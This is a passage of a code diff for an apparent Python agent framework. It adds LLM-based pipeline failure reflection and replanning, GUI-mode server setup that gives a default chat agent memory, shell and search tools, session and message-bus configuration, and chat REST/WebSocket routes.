    latest_result.metadata["reflections"] = [entry.model_dump() for entry in history]
    return latest_result
async def _execute_pipeline(
self,
pipeline: Pipeline,
context: dict[str, Any] | None = None,
) -> PipelineResult:
"""执行 Pipeline 的核心逻辑(不含反思-重规划)。"""
result = PipelineResult(pipeline_name=pipeline.name) result = PipelineResult(pipeline_name=pipeline.name)
result.variables = {**pipeline.variables, **(context or {})} result.variables = {**pipeline.variables, **(context or {})}

View File

@ -56,3 +56,25 @@ class PipelineResult(BaseModel):
stage_results: dict[str, StageResult] = {} stage_results: dict[str, StageResult] = {}
variables: dict[str, Any] = {} variables: dict[str, Any] = {}
error_message: str | None = None error_message: str | None = None
metadata: dict[str, Any] = {}
class AdaptiveConfig(BaseModel):
"""Configuration for adaptive pipeline execution with reflection-replanning."""
# Master switch: PipelineEngine.execute only enters the reflection loop when this is True.
enabled: bool = False
# Upper bound on reflect -> replan -> re-execute rounds after the first failure.
max_reflections: int = 3
# NOTE(review): not read by the engine/reflection code visible in this change — presumably the model name for reflection calls; confirm.
reflection_model: str = "default"
# NOTE(review): not read by the engine/reflection code visible in this change — presumably stage names to exclude; confirm.
skip_stages: list[str] = []
model_config = {"arbitrary_types_allowed": True}
class ReflectionReport(BaseModel):
"""Structured report from pipeline reflection analysis."""
# Failure category; the replanner branches on "timeout", "resource_error" and "input_error".
failure_type: str # input_error, resource_error, logic_error, timeout
# Short description of why the stage failed.
root_cause: str
# Proposed change to apply to the pipeline.
suggested_fix: str
# Name of the stage that failed (empty string when no failed stage was found).
failed_stage: str
# 1-based index of the reflection round that produced this report.
reflection_number: int = 1

View File

@ -0,0 +1,370 @@
"""Pipeline 反思-重规划模块
Pipeline 执行失败时通过 LLM 反思分析失败原因
生成修正后的 Pipeline 重新执行
"""
import json
import logging
from typing import Any
from agentkit.orchestrator.pipeline_schema import (
Pipeline,
PipelineResult,
PipelineStage,
ReflectionReport,
StageResult,
StageStatus,
)
logger = logging.getLogger(__name__)
class PipelineReflector:
    """Analyse why a pipeline run failed and produce a structured report.

    When an LLM gateway is available the failure context (failed stage, error
    message, outputs of completed stages) is sent to the LLM; otherwise, or
    when the LLM path fails, a keyword-based classification of the error
    message is used. The result is a ``ReflectionReport`` carrying
    ``failure_type``, ``root_cause`` and ``suggested_fix``.
    """

    def __init__(self, llm_gateway: Any = None):
        self._llm_gateway = llm_gateway

    async def reflect(
        self,
        pipeline: Pipeline,
        result: PipelineResult,
        reflection_number: int = 1,
    ) -> ReflectionReport:
        """Analyse the failure and return a reflection report.

        Args:
            pipeline: The pipeline definition that was executed.
            result: The failed ``PipelineResult``.
            reflection_number: Ordinal of this reflection attempt.

        Returns:
            A structured ``ReflectionReport``.
        """
        failed_stage, error_message = self._find_failure(result)
        completed_outputs = self._collect_completed_outputs(result)

        if self._llm_gateway is not None:
            try:
                return await self._llm_reflect(
                    pipeline, failed_stage, error_message,
                    completed_outputs, reflection_number,
                )
            except Exception as e:
                # Best effort: any LLM/validation problem degrades to the rules below.
                logger.warning(f"LLM reflection failed, falling back to rule-based: {e}")

        return self._rule_based_reflect(
            failed_stage, error_message, reflection_number,
        )

    def _find_failure(
        self, result: PipelineResult,
    ) -> tuple[str, str]:
        """Return ``(stage_name, error_message)`` of the first failed stage.

        Returns ``("", "no failed stage found")`` when no stage is marked failed.
        """
        for name, sr in result.stage_results.items():
            if sr.status == StageStatus.FAILED:
                return name, sr.error_message or "unknown error"
        return "", "no failed stage found"

    def _collect_completed_outputs(
        self, result: PipelineResult,
    ) -> dict[str, Any]:
        """Return the non-empty outputs of all completed stages, keyed by stage name."""
        return {
            name: sr.output_data
            for name, sr in result.stage_results.items()
            if sr.status == StageStatus.COMPLETED and sr.output_data
        }

    async def _llm_reflect(
        self,
        pipeline: Pipeline,
        failed_stage: str,
        error_message: str,
        completed_outputs: dict[str, Any],
        reflection_number: int,
    ) -> ReflectionReport:
        """Ask the LLM to analyse the failure and parse its answer."""
        prompt = self._build_reflection_prompt(
            pipeline, failed_stage, error_message,
            completed_outputs, reflection_number,
        )
        response = await self._llm_gateway.chat(
            messages=[{"role": "user", "content": prompt}],
            model="default",
        )
        content = response.content if hasattr(response, "content") else str(response)
        return self._parse_reflection_response(
            content, failed_stage, reflection_number,
            error_message=error_message,
        )

    def _build_reflection_prompt(
        self,
        pipeline: Pipeline,
        failed_stage: str,
        error_message: str,
        completed_outputs: dict[str, Any],
        reflection_number: int,
    ) -> str:
        """Build the reflection prompt sent to the LLM."""
        stage_descriptions = [
            f"  - {s.name}: agent={s.agent}, action={s.action}, "
            f"depends_on={s.depends_on}"
            for s in pipeline.stages
        ]
        # Each output is stringified and capped at 200 chars to keep the prompt small.
        completed_summary = json.dumps(
            {k: str(v)[:200] for k, v in completed_outputs.items()},
            ensure_ascii=False,
        )
        return f"""Analyze the following pipeline execution failure and provide a structured reflection report.
Pipeline: {pipeline.name}
Stages:
{chr(10).join(stage_descriptions)}
Failed stage: {failed_stage}
Error message: {error_message}
Completed outputs (summary): {completed_summary}
Reflection attempt: {reflection_number}
Respond in JSON format with these fields:
- failure_type: one of "input_error", "resource_error", "logic_error", "timeout"
- root_cause: brief description of the root cause
- suggested_fix: concrete fix to apply to the pipeline
JSON response:"""

    @staticmethod
    def _strip_code_fence(content: str) -> str:
        """Remove a surrounding Markdown code fence from *content*, if any.

        The opening fence line (which may carry a language tag) is dropped;
        the last line is dropped only when it really is a closing fence, so
        an unterminated fence does not lose its final line of payload.
        """
        text = content.strip()
        if not text.startswith("```"):
            return text
        lines = text.split("\n")[1:]
        if lines and lines[-1].strip().startswith("```"):
            lines = lines[:-1]
        return "\n".join(lines)

    def _parse_reflection_response(
        self,
        content: str,
        failed_stage: str,
        reflection_number: int,
        error_message: str | None = None,
    ) -> ReflectionReport:
        """Parse the LLM's JSON answer into a ``ReflectionReport``.

        Args:
            content: Raw LLM response text, optionally wrapped in a code fence.
            failed_stage: Name of the failed stage, copied into the report.
            reflection_number: Ordinal of this reflection attempt.
            error_message: The stage's real error message. When given, it is
                what the rule-based fallback classifies if the response cannot
                be parsed; when omitted, the raw *content* is classified.

        Returns:
            The parsed report, or a rule-based report when the response is not
            a JSON object.
        """
        try:
            data = json.loads(self._strip_code_fence(content))
        except json.JSONDecodeError as e:
            logger.warning(f"Failed to parse LLM reflection response: {e}")
            data = None
        else:
            if not isinstance(data, dict):
                # Valid JSON but not an object (e.g. a list or a bare string).
                logger.warning(
                    "Failed to parse LLM reflection response: "
                    f"expected a JSON object, got {type(data).__name__}"
                )
                data = None

        if data is None:
            fallback_text = content if error_message is None else error_message
            return self._rule_based_reflect(
                failed_stage, fallback_text, reflection_number,
            )

        return ReflectionReport(
            failure_type=data.get("failure_type", "logic_error"),
            root_cause=data.get("root_cause", "LLM analysis unavailable"),
            suggested_fix=data.get("suggested_fix", ""),
            failed_stage=failed_stage,
            reflection_number=reflection_number,
        )

    def _rule_based_reflect(
        self,
        failed_stage: str,
        error_message: str,
        reflection_number: int,
    ) -> ReflectionReport:
        """Classify the failure from keywords in *error_message* (fallback path)."""
        error_lower = error_message.lower()
        if "timeout" in error_lower or "timed out" in error_lower:
            failure_type = "timeout"
            root_cause = f"Stage '{failed_stage}' timed out"
            suggested_fix = "Increase timeout_seconds and add retry_policy"
        elif "not found" in error_lower or "404" in error_lower:
            failure_type = "resource_error"
            root_cause = f"Required resource not found in stage '{failed_stage}'"
            suggested_fix = "Add pre-check step or adjust resource reference"
        elif "invalid" in error_lower or "validation" in error_lower:
            failure_type = "input_error"
            root_cause = f"Invalid input to stage '{failed_stage}'"
            suggested_fix = "Add input validation step before this stage"
        else:
            failure_type = "logic_error"
            root_cause = f"Stage '{failed_stage}' failed: {error_message[:200]}"
            suggested_fix = "Review stage logic and adjust action or inputs"
        return ReflectionReport(
            failure_type=failure_type,
            root_cause=root_cause,
            suggested_fix=suggested_fix,
            failed_stage=failed_stage,
            reflection_number=reflection_number,
        )
class PipelineReplanner:
    """Produce a corrected pipeline from a reflection report.

    With an LLM gateway the corrected pipeline is requested from the LLM;
    otherwise, or when that fails, only the failed stage is adjusted by rule
    according to the report's ``failure_type``.
    """

    def __init__(self, llm_gateway: Any = None):
        self._llm_gateway = llm_gateway

    async def replan(
        self,
        pipeline: Pipeline,
        result: PipelineResult,
        report: ReflectionReport,
    ) -> Pipeline:
        """Re-plan *pipeline* based on the reflection report.

        Args:
            pipeline: The pipeline that failed.
            result: The failed ``PipelineResult``.
            report: The reflection report for that failure.

        Returns:
            The corrected pipeline.
        """
        if self._llm_gateway is not None:
            try:
                return await self._llm_replan(pipeline, result, report)
            except Exception as e:
                # Best effort: degrade to the rule-based adjustment below.
                logger.warning(f"LLM replanning failed, falling back to rule-based: {e}")

        return self._rule_based_replan(pipeline, result, report)

    async def _llm_replan(
        self,
        pipeline: Pipeline,
        result: PipelineResult,
        report: ReflectionReport,
    ) -> Pipeline:
        """Ask the LLM for a corrected pipeline and parse its answer."""
        completed_stages = [
            name for name, sr in result.stage_results.items()
            if sr.status == StageStatus.COMPLETED
        ]
        prompt = f"""Based on the reflection report, generate a corrected pipeline.
Original pipeline: {pipeline.name}
Stages: {[s.name for s in pipeline.stages]}
Completed stages: {completed_stages}
Failed stage: {report.failed_stage}
Failure type: {report.failure_type}
Root cause: {report.root_cause}
Suggested fix: {report.suggested_fix}
Generate a corrected pipeline in JSON format with the same structure as the original.
Only modify stages that need changes based on the reflection.
Keep completed stages unchanged.
JSON pipeline:"""
        response = await self._llm_gateway.chat(
            messages=[{"role": "user", "content": prompt}],
            model="default",
        )
        content = response.content if hasattr(response, "content") else str(response)
        return self._parse_pipeline_response(content, pipeline)

    @staticmethod
    def _strip_code_fence(content: str) -> str:
        """Remove a surrounding Markdown code fence from *content*, if any.

        The opening fence line (which may carry a language tag) is dropped;
        the last line is dropped only when it really is a closing fence, so
        an unterminated fence does not lose its final line of payload.
        """
        text = content.strip()
        if not text.startswith("```"):
            return text
        lines = text.split("\n")[1:]
        if lines and lines[-1].strip().startswith("```"):
            lines = lines[:-1]
        return "\n".join(lines)

    def _parse_pipeline_response(
        self, content: str, original: Pipeline,
    ) -> Pipeline:
        """Parse the LLM's pipeline JSON; return *original* when it is unusable.

        A response that is not a JSON object, or that carries no stages, is
        rejected instead of being turned into a zero-stage pipeline.
        """
        try:
            data = json.loads(self._strip_code_fence(content))
            if not isinstance(data, dict):
                raise ValueError(
                    f"expected a JSON object, got {type(data).__name__}"
                )
            raw_stages = data.get("stages") or []
            if not raw_stages:
                raise ValueError("response contains no stages")
            stages = [PipelineStage(**s) for s in raw_stages]
            return Pipeline(
                name=data.get("name", original.name),
                version=data.get("version", original.version),
                description=data.get("description", original.description),
                stages=stages,
                variables=data.get("variables", original.variables),
            )
        except Exception as e:
            # Covers malformed JSON as well as stage/pipeline construction errors.
            logger.warning(f"Failed to parse LLM replan response: {e}")
            return original

    def _rule_based_replan(
        self,
        pipeline: Pipeline,
        result: PipelineResult,
        report: ReflectionReport,
    ) -> Pipeline:
        """Rule-based fallback: adjust only the stage that failed.

        Completed stages and stages after the failure are copied unchanged.
        A stage named like ``report.failed_stage`` is adjusted unless it is
        recorded as completed in *result*.
        """
        completed_stages = {
            name for name, sr in result.stage_results.items()
            if sr.status == StageStatus.COMPLETED
        }
        new_stages: list[PipelineStage] = [
            self._adjust_failed_stage(stage, report)
            if stage.name not in completed_stages and stage.name == report.failed_stage
            else stage
            for stage in pipeline.stages
        ]
        return Pipeline(
            name=f"{pipeline.name}_replanned",
            version=pipeline.version,
            description=f"Replanned after reflection: {report.root_cause}",
            stages=new_stages,
            variables=pipeline.variables,
        )

    @staticmethod
    def _default_retry_policy() -> Any:
        """Return the retry policy given to a stage that has none (two attempts)."""
        # Imported lazily, as in the original code, to keep the module import light.
        from agentkit.orchestrator.retry import StepRetryPolicy

        return StepRetryPolicy(max_attempts=2)

    def _adjust_failed_stage(
        self, stage: PipelineStage, report: ReflectionReport,
    ) -> PipelineStage:
        """Return a copy of *stage* adjusted according to ``report.failure_type``.

        - ``timeout``: double ``timeout_seconds`` (capped at 3600) and add a
          retry policy when the stage has none.
        - ``resource_error``: set ``continue_on_failure``.
        - ``input_error``: add a retry policy when the stage has none.
        - anything else: the stage is copied unchanged.
        """
        adjustments: dict[str, Any] = {}
        if report.failure_type == "timeout":
            adjustments["timeout_seconds"] = min(
                stage.timeout_seconds * 2, 3600,
            )
            if stage.retry_policy is None:
                adjustments["retry_policy"] = self._default_retry_policy()
        elif report.failure_type == "resource_error":
            adjustments["continue_on_failure"] = True
        elif report.failure_type == "input_error":
            # Retry in case the input becomes available on a later attempt.
            if stage.retry_policy is None:
                adjustments["retry_policy"] = self._default_retry_policy()
        return stage.model_copy(update=adjustments)

View File

@ -21,7 +21,7 @@ from agentkit.skills.base import Skill, SkillConfig
from agentkit.skills.registry import SkillRegistry from agentkit.skills.registry import SkillRegistry
from agentkit.tools.registry import ToolRegistry from agentkit.tools.registry import ToolRegistry
from agentkit.server.config import ServerConfig from agentkit.server.config import ServerConfig
from agentkit.server.routes import agents, tasks, skills, llm, health, metrics, ws, evolution, memory, portal, evolution_dashboard, kb_management, skill_management, workflows from agentkit.server.routes import agents, tasks, skills, llm, health, metrics, ws, evolution, memory, portal, evolution_dashboard, kb_management, skill_management, workflows, chat
from agentkit.server.middleware import APIKeyAuthMiddleware, RateLimitMiddleware from agentkit.server.middleware import APIKeyAuthMiddleware, RateLimitMiddleware
from agentkit.server.task_store import create_task_store from agentkit.server.task_store import create_task_store
from agentkit.server.runner import BackgroundRunner from agentkit.server.runner import BackgroundRunner
@ -96,6 +96,106 @@ async def lifespan(app: FastAPI):
if mcp_manager is not None: if mcp_manager is not None:
await mcp_manager.start_all() await mcp_manager.start_all()
# In GUI mode, ensure a default chat agent exists with memory + tools
gui_mode = os.environ.get("AGENTKIT_GUI_MODE")
if gui_mode and not app.state.agent_pool.list_agents():
from agentkit.core.config_driven import AgentConfig
from agentkit.memory.profile import MemoryStore
from agentkit.tools.memory_tool import MemoryTool
from agentkit.tools.shell import ShellTool
from agentkit.tools.web_search import WebSearchTool
from agentkit.tools.web_crawl import WebCrawlTool
from agentkit.tools.baidu_search import BaiduSearchTool
# Initialize memory store and build system prompt
memory_store = MemoryStore()
memory_store.ensure_defaults()
memory_snapshot = memory_store.load_all()
base_prompt = (
"你是一个有帮助的AI助手。请记住我们对话的上下文并在后续对话中引用之前的内容。回答要清晰简洁请使用中文回复。\n\n"
"重要提示:当你不确定事实信息、时事新闻或任何你不确信的话题时,"
"你必须先使用搜索工具查找准确和最新的信息,然后再回答。"
"中文内容优先使用 baidu_search 工具,英文/国际内容使用 web_search。"
"在能够搜索到真相的情况下,绝不猜测或编造答案。"
"始终优先搜索而不是给出可能不正确的信息。"
)
effective_system_prompt = memory_store.build_system_prompt(memory_snapshot, base_prompt)
# Store memory_store on app.state for chat routes to use
app.state.memory_store = memory_store
default_config = AgentConfig(
name="default",
agent_type="chat",
task_mode="llm_generate",
description="Default chat agent for GUI",
prompt={"system": effective_system_prompt},
)
try:
agent = await app.state.agent_pool.create_agent(default_config)
# Register tools into the agent's tool registry
search_api_keys = {
"tavily_api_key": os.environ.get("TAVILY_API_KEY"),
"serper_api_key": os.environ.get("SERPER_API_KEY"),
}
agent._tool_registry.register(MemoryTool(memory_store=memory_store))
agent._tool_registry.register(ShellTool(working_dir=os.getcwd()))
agent._tool_registry.register(BaiduSearchTool())
agent._tool_registry.register(WebSearchTool(**search_api_keys))
agent._tool_registry.register(WebCrawlTool())
# Override system prompt with memory-injected version
agent._system_prompt = effective_system_prompt
logger.info("GUI mode: created default chat agent with memory + tools")
except Exception as e:
logger.warning(f"GUI mode: failed to create default agent: {e}")
# Load skills from config and register into SkillRegistry
try:
from agentkit.skills.loader import SkillLoader
skill_registry = app.state.skill_registry
tool_registry = app.state.tool_registry
# Register GUI tools into the shared tool registry so skills can bind them
for tool in agent._tool_registry.list_tools():
try:
tool_registry.register(tool)
except Exception:
pass # Already registered
# Load skills from configured paths
server_config = getattr(app.state, "server_config", None)
if server_config and server_config.skill_paths:
loader = SkillLoader(
skill_registry=skill_registry,
tool_registry=tool_registry,
)
for skill_path in server_config.skill_paths:
from pathlib import Path as _P
p = _P(skill_path)
if p.is_dir():
loaded = loader.load_from_directory(str(p))
logger.info(f"GUI mode: loaded {len(loaded)} skills from {p}")
elif p.is_file() and p.suffix in (".yaml", ".yml"):
try:
loader.load_from_file(str(p))
logger.info(f"GUI mode: loaded skill from {p}")
except Exception as se:
logger.warning(f"GUI mode: failed to load skill from {p}: {se}")
logger.info(f"GUI mode: {len(skill_registry.list_skills())} skills registered")
except Exception as e:
logger.warning(f"GUI mode: failed to load skills: {e}")
elif gui_mode:
# Agent already exists (e.g. from config), still ensure memory store is available
if not hasattr(app.state, "memory_store") or app.state.memory_store is None:
from agentkit.memory.profile import MemoryStore
memory_store = MemoryStore()
memory_store.ensure_defaults()
app.state.memory_store = memory_store
yield yield
# Shutdown # Shutdown
@ -151,6 +251,24 @@ def _on_config_change(app: FastAPI, config: ServerConfig) -> None:
# Reload skills if skill paths changed # Reload skills if skill paths changed
try: try:
new_skill_registry = _build_skill_registry(config) new_skill_registry = _build_skill_registry(config)
# Re-bind tools from the shared tool_registry so skills don't lose their bindings
tool_registry = getattr(app.state, "tool_registry", None)
if tool_registry:
from agentkit.skills.loader import SkillLoader
loader = SkillLoader(
skill_registry=new_skill_registry,
tool_registry=tool_registry,
)
for skill_path in (config.skill_paths or []):
from pathlib import Path as _P
p = _P(skill_path)
if p.is_dir():
loader.load_from_directory(str(p))
elif p.is_file() and p.suffix in (".yaml", ".yml"):
try:
loader.load_from_file(str(p))
except Exception:
pass
app.state.skill_registry = new_skill_registry app.state.skill_registry = new_skill_registry
if hasattr(app.state, "agent_pool") and app.state.agent_pool is not None: if hasattr(app.state, "agent_pool") and app.state.agent_pool is not None:
app.state.agent_pool._skill_registry = new_skill_registry app.state.agent_pool._skill_registry = new_skill_registry
@ -191,6 +309,20 @@ def create_app(
if server_config is None: if server_config is None:
config_path = os.environ.get("AGENTKIT_CONFIG_PATH") config_path = os.environ.get("AGENTKIT_CONFIG_PATH")
if config_path and os.path.exists(config_path): if config_path and os.path.exists(config_path):
# Load .env before parsing config (so ${ENV_VAR} substitutions work)
from pathlib import Path as _P
_dotenv = _P(config_path).parent / ".env"
if _dotenv.exists():
with open(_dotenv, encoding="utf-8") as _f:
for _line in _f:
_line = _line.strip()
if not _line or _line.startswith("#") or "=" not in _line:
continue
_key, _, _val = _line.partition("=")
_key = _key.strip()
_val = _val.strip().strip("\"'")
if _key and _key not in os.environ:
os.environ[_key] = _val
server_config = ServerConfig.from_yaml(config_path) server_config = ServerConfig.from_yaml(config_path)
app = FastAPI(title="AgentKit Server", version="2.0.0", lifespan=lifespan) app = FastAPI(title="AgentKit Server", version="2.0.0", lifespan=lifespan)
@ -271,11 +403,23 @@ def create_app(
logger.info("HeadroomRetrieveTool registered (CCR retrieval enabled)") logger.info("HeadroomRetrieveTool registered (CCR retrieval enabled)")
except ImportError: except ImportError:
pass pass
# Initialize MessageBus for inter-agent communication
from agentkit.bus.redis_bus import create_message_bus
bus_config = {}
if server_config and hasattr(server_config, "bus") and server_config.bus:
bus_config = server_config.bus
message_bus = create_message_bus(
backend=bus_config.get("backend", "memory"),
redis_url=bus_config.get("redis_url", "redis://localhost:6379/0"),
)
app.state.message_bus = message_bus
app.state.agent_pool = AgentPool( app.state.agent_pool = AgentPool(
llm_gateway=app.state.llm_gateway, llm_gateway=app.state.llm_gateway,
skill_registry=app.state.skill_registry, skill_registry=app.state.skill_registry,
tool_registry=app.state.tool_registry, tool_registry=app.state.tool_registry,
compressor=compressor, compressor=compressor,
message_bus=message_bus,
) )
app.state.intent_router = IntentRouter(llm_gateway=app.state.llm_gateway) app.state.intent_router = IntentRouter(llm_gateway=app.state.llm_gateway)
app.state.quality_gate = QualityGate() app.state.quality_gate = QualityGate()
@ -301,6 +445,21 @@ def create_app(
app.state.server_config = server_config app.state.server_config = server_config
app.state.api_key = effective_api_key app.state.api_key = effective_api_key
# Initialize session manager for Chat mode
from agentkit.session.manager import SessionManager
from agentkit.session.store import create_session_store
session_config = {}
if server_config and hasattr(server_config, "session") and server_config.session:
session_config = server_config.session
# GUI mode defaults to file-backed sessions for persistence
session_backend = session_config.get("backend", "file" if os.environ.get("AGENTKIT_GUI_MODE") else "memory")
session_store = create_session_store(
backend=session_backend,
redis_url=session_config.get("redis_url", "redis://localhost:6379/0"),
ttl_seconds=session_config.get("ttl_seconds", 86400),
)
app.state.session_manager = SessionManager(store=session_store)
# Initialize evolution store if configured # Initialize evolution store if configured
if server_config and hasattr(server_config, 'evolution') and server_config.evolution: if server_config and hasattr(server_config, 'evolution') and server_config.evolution:
try: try:
@ -431,5 +590,22 @@ def create_app(
app.include_router(kb_management.router, prefix="/api/v1") app.include_router(kb_management.router, prefix="/api/v1")
app.include_router(skill_management.router, prefix="/api/v1") app.include_router(skill_management.router, prefix="/api/v1")
app.include_router(workflows.router, prefix="/api/v1") app.include_router(workflows.router, prefix="/api/v1")
app.include_router(chat.router, prefix="/api/v1")
# Serve GUI when in GUI mode
gui_mode = os.environ.get("AGENTKIT_GUI_MODE")
if gui_mode:
from pathlib import Path as _Path
from fastapi.responses import HTMLResponse, FileResponse
_static_dir = _Path(__file__).parent / "static"
@app.get("/", response_class=HTMLResponse, include_in_schema=False)
async def gui_index():
"""Serve the GUI index page."""
index_path = _static_dir / "index.html"
if index_path.exists():
return FileResponse(str(index_path))
return HTMLResponse("<h1>AgentKit GUI not found</h1>", status_code=404)
return app return app

View File

@ -106,6 +106,8 @@ class ServerConfig:
mcp_servers: dict[str, MCPServerConfig] | None = None, mcp_servers: dict[str, MCPServerConfig] | None = None,
telemetry: dict[str, Any] | None = None, telemetry: dict[str, Any] | None = None,
compression: dict[str, Any] | None = None, compression: dict[str, Any] | None = None,
session: dict[str, Any] | None = None,
bus: dict[str, Any] | None = None,
on_change: Callable[["ServerConfig"], None] | None = None, on_change: Callable[["ServerConfig"], None] | None = None,
): ):
self.host = host self.host = host
@ -124,6 +126,8 @@ class ServerConfig:
self.mcp_servers = mcp_servers or {} self.mcp_servers = mcp_servers or {}
self.telemetry = telemetry or {} self.telemetry = telemetry or {}
self.compression = compression or {} self.compression = compression or {}
self.session = session or {}
self.bus = bus or {}
self.on_change = on_change self.on_change = on_change
# Config watching state # Config watching state
@ -131,6 +135,13 @@ class ServerConfig:
self._watcher_task: asyncio.Task | None = None self._watcher_task: asyncio.Task | None = None
self._last_mtime: float = 0.0 self._last_mtime: float = 0.0
def has_llm_provider(self) -> bool:
    """Return True when at least one configured LLM provider has a non-empty API key."""
    configured = self.llm_config.providers.values()
    return any(bool(entry.api_key) for entry in configured)
@classmethod @classmethod
def from_yaml(cls, path: str) -> "ServerConfig": def from_yaml(cls, path: str) -> "ServerConfig":
"""Load configuration from a YAML file.""" """Load configuration from a YAML file."""
@ -172,6 +183,9 @@ class ServerConfig:
# Compression config # Compression config
compression_data = data.get("compression", {}) compression_data = data.get("compression", {})
# Session config
session_data = data.get("session", {})
return cls( return cls(
host=server.get("host", "0.0.0.0"), host=server.get("host", "0.0.0.0"),
port=server.get("port", 8001), port=server.get("port", 8001),
@ -189,6 +203,8 @@ class ServerConfig:
mcp_servers=mcp_servers, mcp_servers=mcp_servers,
telemetry=telemetry_data, telemetry=telemetry_data,
compression=compression_data, compression=compression_data,
session=session_data,
bus=server.get("bus"),
) )
@staticmethod @staticmethod
@ -380,6 +396,7 @@ class ServerConfig:
self.mcp_servers = new_config.mcp_servers self.mcp_servers = new_config.mcp_servers
self.telemetry = new_config.telemetry self.telemetry = new_config.telemetry
self.compression = new_config.compression self.compression = new_config.compression
self.session = new_config.session
self._last_mtime = new_config._last_mtime self._last_mtime = new_config._last_mtime
logger.info(f"Config reloaded from {path}") logger.info(f"Config reloaded from {path}")

View File

@ -0,0 +1,462 @@
"""Chat API routes — multi-turn conversation with Agent via REST and WebSocket."""
from __future__ import annotations
import asyncio
import json
import logging
from typing import Any
from fastapi import APIRouter, HTTPException, WebSocket, WebSocketDisconnect, Request
from pydantic import BaseModel
from agentkit.core.protocol import CancellationToken
from agentkit.core.react import ReActEngine
from agentkit.session.manager import SessionManager
from agentkit.session.models import MessageRole, SessionStatus
logger = logging.getLogger(__name__)
router = APIRouter(prefix="/chat", tags=["chat"])
# ── Request/Response schemas ──────────────────────────────────────────
# Request body for POST /chat/sessions.
class CreateSessionRequest(BaseModel):
    # Name of the agent the new session is bound to (forwarded to SessionManager.create_session).
    agent_name: str
    # Optional free-form metadata forwarded unchanged to SessionManager.create_session.
    metadata: dict[str, Any] | None = None
# Request body for POST /chat/sessions/{session_id}/messages.
class SendMessageRequest(BaseModel):
    # Text of the message appended to the session history.
    content: str
    # NOTE(review): send_message always stores the message as MessageRole.USER,
    # so this field appears to be unused — confirm before relying on it.
    role: str = "user"
# Serialized view of a chat session, built by _session_to_response.
class SessionResponse(BaseModel):
    session_id: str
    agent_name: str
    # String value of the session's status enum (session.status.value).
    status: str
    metadata: dict[str, Any]
    # ISO-8601 strings produced with datetime.isoformat().
    created_at: str
    updated_at: str
# Serialized view of one chat message, built by _message_to_response.
class MessageResponse(BaseModel):
    message_id: str
    session_id: str
    # String value of the message's role enum (msg.role.value).
    role: str
    content: str
    # Copied from the stored message; None when the message carries no value.
    tool_call_id: str | None = None
    agent_name: str | None = None
    # ISO-8601 string produced with datetime.isoformat().
    created_at: str
# ── Chat WebSocket connection manager ─────────────────────────────────
class ChatConnectionManager:
    """Registry of live chat WebSockets, grouped by session id."""

    def __init__(self) -> None:
        # Maps session_id to the (websocket, pending_replies) pairs attached to it.
        self._connections: dict[str, list[tuple[WebSocket, dict[str, asyncio.Future]]]] = {}

    def add(self, session_id: str, ws: WebSocket, pending: dict[str, asyncio.Future]) -> None:
        """Attach *ws* together with its pending-reply map to *session_id*."""
        bucket = self._connections.setdefault(session_id, [])
        bucket.append((ws, pending))

    def remove(self, session_id: str, ws: WebSocket) -> None:
        """Detach *ws* from *session_id*; the session entry is dropped once empty."""
        current = self._connections.get(session_id)
        if current is None:
            return
        remaining = [pair for pair in current if pair[0] is not ws]
        if remaining:
            self._connections[session_id] = remaining
        else:
            del self._connections[session_id]

    def get_connections(self, session_id: str) -> list[tuple[WebSocket, dict[str, asyncio.Future]]]:
        """Return the (websocket, pending_replies) pairs for *session_id* (empty list if none)."""
        return self._connections.get(session_id, [])

    async def send_json(self, session_id: str, message: dict) -> None:
        """Send a JSON message to all connections for a session.

        Sockets whose send raises are collected and removed after the loop.
        """
        dead = []
        for sock, _pending in self._connections.get(session_id, []):
            try:
                await sock.send_json(message)
            except Exception:
                dead.append(sock)
        for sock in dead:
            self.remove(session_id, sock)
chat_manager = ChatConnectionManager()
# ── Helper ────────────────────────────────────────────────────────────
def _get_session_manager(request: Request) -> SessionManager:
return request.app.state.session_manager
def _session_to_response(session) -> SessionResponse:
    """Convert a stored session object into its API response model."""
    fields = {
        "session_id": session.session_id,
        "agent_name": session.agent_name,
        # The status enum is exposed through its plain value.
        "status": session.status.value,
        "metadata": session.metadata,
        "created_at": session.created_at.isoformat(),
        "updated_at": session.updated_at.isoformat(),
    }
    return SessionResponse(**fields)
def _message_to_response(msg) -> MessageResponse:
    """Convert a stored message object into its API response model."""
    fields = {
        "message_id": msg.message_id,
        "session_id": msg.session_id,
        # The role enum is exposed through its plain value.
        "role": msg.role.value,
        "content": msg.content,
        "tool_call_id": msg.tool_call_id,
        "agent_name": msg.agent_name,
        "created_at": msg.created_at.isoformat(),
    }
    return MessageResponse(**fields)
# ── REST endpoints ────────────────────────────────────────────────────
@router.get("/sessions", response_model=list[SessionResponse])
async def list_sessions(req: Request):
    """List all chat sessions."""
    manager = _get_session_manager(req)
    # Every stored session is serialized with the shared converter.
    return [_session_to_response(item) for item in await manager.list_sessions()]
@router.post("/sessions", response_model=SessionResponse)
async def create_session(request: CreateSessionRequest, req: Request):
    """Create a new chat session bound to an Agent."""
    manager = _get_session_manager(req)
    # agent_name and metadata are forwarded unchanged from the request body.
    created = await manager.create_session(
        agent_name=request.agent_name,
        metadata=request.metadata,
    )
    return _session_to_response(created)
@router.get("/sessions/{session_id}", response_model=SessionResponse)
async def get_session(session_id: str, req: Request):
    """Get session information."""
    found = await _get_session_manager(req).get_session(session_id)
    if found is not None:
        return _session_to_response(found)
    # Unknown session ids are reported as 404.
    raise HTTPException(status_code=404, detail=f"Session '{session_id}' not found")
@router.get("/sessions/{session_id}/messages", response_model=list[MessageResponse])
async def get_messages(session_id: str, req: Request, limit: int | None = None, offset: int = 0):
    """Get conversation history for a session."""
    manager = _get_session_manager(req)
    # The session must exist before its history is read.
    if await manager.get_session(session_id) is None:
        raise HTTPException(status_code=404, detail=f"Session '{session_id}' not found")
    history = await manager.get_messages(session_id, limit=limit, offset=offset)
    return list(map(_message_to_response, history))
@router.post("/sessions/{session_id}/messages", response_model=MessageResponse)
async def send_message(session_id: str, request: SendMessageRequest, req: Request):
    """Send a message to the Agent (synchronous mode — waits for full reply)."""
    # Raises HTTPException 404 (unknown session or agent), 400 (closed session)
    # or 500 (agent execution failed). Returns the stored assistant message.
    sm = _get_session_manager(req)
    session = await sm.get_session(session_id)
    if session is None:
        raise HTTPException(status_code=404, detail=f"Session '{session_id}' not found")
    if session.status == SessionStatus.CLOSED:
        raise HTTPException(status_code=400, detail=f"Session '{session_id}' is closed")

    # Resolve the agent BEFORE touching the history, so a request that is
    # rejected with 404 does not leave an orphan user message in the session
    # (this matches the order used by the WebSocket handler).
    pool = req.app.state.agent_pool
    agent = pool.get_agent(session.agent_name)
    if agent is None:
